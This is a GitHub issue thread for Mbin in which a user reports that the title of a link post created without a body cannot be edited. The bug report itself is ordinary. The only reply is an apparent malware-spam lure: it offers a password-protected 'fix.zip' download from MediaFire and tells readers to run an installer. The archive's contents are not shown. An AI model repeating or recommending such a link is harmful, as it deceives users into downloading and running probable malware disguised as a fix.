### ISSUE TITLE
Cannot edit title of link post if post was made without body

### ISSUE THREAD

**Issue by lindseymraz** [MbinOrg/mbin#1064]
**Describe the bug**
After making a link post without filling out the body field, you cannot edit the title of that link post.

**On which Mbin instance did you find the bug?**
[kbin.melroy.org]

**Which Mbin version was running on the instance?**
[1.7.1-rc4]

**To Reproduce**
1. I hit Add new link and made a post with a link and title, but no body.
2. Go back and change your post title to something else.
3. Hit Edit thread. Get hit with a "Fill out this field" popup with the arrow pointing at the Body field.

**Expected behavior**
After I hit Edit thread, I expect for the edit to take place and to be returned to where I'm usually returned after I edit a post. Since I was allowed to make the post with no body in the first place, I did not expect to be blocked by a popup implying my post needs a body when I returned to edit the post.

**Smartphone (please complete the following information):**
 - Device: [iPhone 13 mini]
 - OS: [iOS 17.1.2]
 - Browser [stock browser, Safari]
 - Browser Version [e.g. 17.1]

**Comment by miniMuggle** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."
